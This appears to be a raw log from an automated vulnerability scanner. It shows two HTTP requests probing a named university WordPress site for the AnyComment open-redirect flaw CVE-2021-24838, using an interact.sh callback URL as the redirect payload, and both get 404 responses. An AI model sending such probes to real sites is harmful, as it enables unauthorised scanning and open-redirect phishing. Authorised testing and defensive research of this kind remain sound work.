[CVE-2021-24838] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh


GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-24838] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 65ed266dda094f56ecb91fc422768658.cloudfront.net (CloudFront)
X-Amz-Cf-Id: r6l4p4OGhKTf7HaJB463Dzh_YhwO2iTCXflK7CCq8_NfCBM7oE2L6Q==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

[CVE-2021-24838] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh


GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-24838] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 58ff8bffb8202620fab96966a8d77160.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e_Efc_rfGxLgd28Q_VHQCjaLNyFnHkBv_XJ3vaHmCik70Im9Xi4gAw==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

